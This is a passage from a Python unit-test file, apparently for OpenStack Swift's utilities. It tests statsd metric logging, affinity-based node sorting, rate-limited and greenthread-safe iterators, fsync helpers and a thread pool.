iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def setUp(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('localhost', port,
# socket.AF_INET) returned once
return [(socket.AF_INET, # address family
socket.SOCK_STREAM, # socket type
socket.IPPROTO_TCP, # socket protocol
'', # canonical name,
('127.0.0.1', port)), # socket address
(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('127.0.0.1', port))]
self.real_getaddrinfo = utils.socket.getaddrinfo
self.getaddrinfo_patcher = mock.patch.object(
utils.socket, 'getaddrinfo', fake_getaddrinfo)
self.mock_getaddrinfo = self.getaddrinfo_patcher.start()
self.addCleanup(self.getaddrinfo_patcher.stop)
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertIsNone(logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_ipv4_or_ipv6_hostname_defaults_to_ipv4(self):
def stub_getaddrinfo_both_ipv4_and_ipv6(host, port, family, *rest):
if family == socket.AF_INET:
return [(socket.AF_INET, 'blah', 'blah', 'blah',
('127.0.0.1', int(port)))]
elif family == socket.AF_INET6:
# Implemented so an incorrectly ordered implementation (IPv6
# then IPv4) would realistically fail.
return [(socket.AF_INET6, 'blah', 'blah', 'blah',
('::1', int(port), 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo',
new=stub_getaddrinfo_both_ipv4_and_ipv6):
logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('localhost', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv4_instantiation_and_socket_creation(self):
logger = utils.get_logger({
'log_statsd_host': '127.0.0.1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target, ('127.0.0.1', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
def test_ipv6_instantiation_and_socket_creation(self):
# We have to check the given hostname or IP for IPv4/IPv6 on logger
# instantiation so we don't call getaddrinfo() too often and don't have
# to call bind() on our socket to detect IPv4/IPv6 on every send.
#
# This test uses the real getaddrinfo, so we patch over the mock to
# put the real one back. If we just stop the mock, then
# unittest.exit() blows up, but stacking real-fake-real works okay.
with mock.patch.object(utils.socket, 'getaddrinfo',
self.real_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET6)
self.assertEqual(statsd_client._target, ('::1', 9876, 0, 0))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET6)
def test_bad_hostname_instantiation(self):
with mock.patch.object(utils.socket, 'getaddrinfo',
side_effect=utils.socket.gaierror("whoops")):
logger = utils.get_logger({
'log_statsd_host': 'i-am-not-a-hostname-or-ip',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
self.assertEqual(statsd_client._sock_family, socket.AF_INET)
self.assertEqual(statsd_client._target,
('i-am-not-a-hostname-or-ip', 9876))
got_sock = statsd_client._open_socket()
self.assertEqual(got_sock.family, socket.AF_INET)
# Maybe the DNS server gets fixed in a bit and it starts working... or
# maybe the DNS record hadn't propagated yet. In any case, failed
# statsd sends will warn in the logs until the DNS failure or invalid
# IP address in the configuration is fixed.
def test_sending_ipv6(self):
def fake_getaddrinfo(host, port, *args):
# this is what a real getaddrinfo('::1', port,
# socket.AF_INET6) returned once
return [(socket.AF_INET6,
socket.SOCK_STREAM,
socket.IPPROTO_TCP,
'', ('::1', port, 0, 0)),
(socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP,
'',
('::1', port, 0, 0))]
with mock.patch.object(utils.socket, 'getaddrinfo', fake_getaddrinfo):
logger = utils.get_logger({
'log_statsd_host': '::1',
'log_statsd_port': '9876',
}, 'some-name', log_route='some-route')
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket()
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
self.assertEqual(fl.get_lines_for_level('warning'), [])
self.assertEqual(mock_socket.sent,
[(b'some-name.tunafish:1|c', ('::1', 9876, 0, 0))])
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith(b"|@0.5"))
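        # The payloads above use the plain StatsD wire format,
        # "<metric>:<value>|<type>" with an optional "|@<sample_rate>"
        # suffix when the packet was sampled.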
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
suffix = "|@%s" % effective_sample_rate
if six.PY3:
suffix = suffix.encode('utf-8')
self.assertTrue(payload.endswith(suffix), payload)
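        # i.e. the effective rate is the default (or per-call) sample_rate
        # multiplied by log_statsd_sample_rate_factor, and a packet is only
        # emitted when random() falls below that product.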
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
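        # Summary of the cases above: 2xx and the "expected" client errors
        # (404, 412, 416) are timed under METHOD.timing, while other failures
        # such as 401 are recorded under METHOD.errors.timing.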
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
__next__ = next
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
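        # "r1=100, r4=200, r3z1=1" assigns priority 1 to r3z1 nodes, 100 to
        # r1 and 200 to r4; lower priorities sort first, and nodes matching
        # no rule keep their original relative order at the end.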
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_rate_limiting_sometimes(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100,
ratelimit_if=lambda item: item % 23 != 0)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.5:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# we'd get 51 without the ratelimit_if, but because 0, 23 and 46
# weren't subject to ratelimiting, we get 54 instead
self.assertEqual(len(got), 54)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
sorted([resp for resp in pile])
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and b'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
if six.PY3:
got = got.decode('utf-8')
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertIsNone(logger.update_stats('foo', 88))
self.assertIsNone(logger.update_stats('foo', 88, 0.57))
self.assertIsNone(logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertIsNone(logger.increment('foo'))
self.assertIsNone(logger.increment('foo', 0.57))
self.assertIsNone(logger.increment('foo', sample_rate=0.61))
self.assertIsNone(logger.decrement('foo'))
self.assertIsNone(logger.decrement('foo', 0.57))
self.assertIsNone(logger.decrement('foo', sample_rate=0.61))
self.assertIsNone(logger.timing('foo', 88.048))
self.assertIsNone(logger.timing('foo', 88.57, 0.34))
self.assertIsNone(logger.timing('foo', 88.998, sample_rate=0.82))
self.assertIsNone(logger.timing_since('foo', 8938))
self.assertIsNone(logger.timing_since('foo', 8948, 0.57))
self.assertIsNone(logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEqual(b'\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestThreadPool(unittest.TestCase):
def setUp(self):
self.tp = None
def tearDown(self):
if self.tp:
self.tp.terminate()
def _pipe_count(self):
# Counts the number of pipes that this process owns.
fd_dir = "/proc/%d/fd" % os.getpid()
def is_pipe(path):
try:
stat_result = os.stat(path)
return stat.S_ISFIFO(stat_result.st_mode)
except OSError:
return False
return len([fd for fd in os.listdir(fd_dir)
if is_pipe(os.path.join(fd_dir, fd))])
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_run_in_thread_without_threads(self):
        # with zero threads, run_in_thread doesn't actually use a separate thread
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.run_in_thread,
self._raise_valueerror)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_preserving_stack_trace_from_thread(self):
def gamma():
return 1 / 0 # ZeroDivisionError
def beta():
return gamma()
def alpha():
return beta()
tp = self.tp = utils.ThreadPool(1)
try:
tp.run_in_thread(alpha)
except ZeroDivisionError:
# NB: format is (filename, line number, function name, text)
tb_func = [elem[2] for elem
in traceback.extract_tb(sys.exc_info()[2])]
else:
self.fail("Expected ZeroDivisionError")
self.assertEqual(tb_func[-1], "gamma")
self.assertEqual(tb_func[-2], "beta")
self.assertEqual(tb_func[-3], "alpha")
# omit the middle; what's important is that the start and end are
# included, not the exact names of helper methods
self.assertEqual(tb_func[1], "run_in_thread")
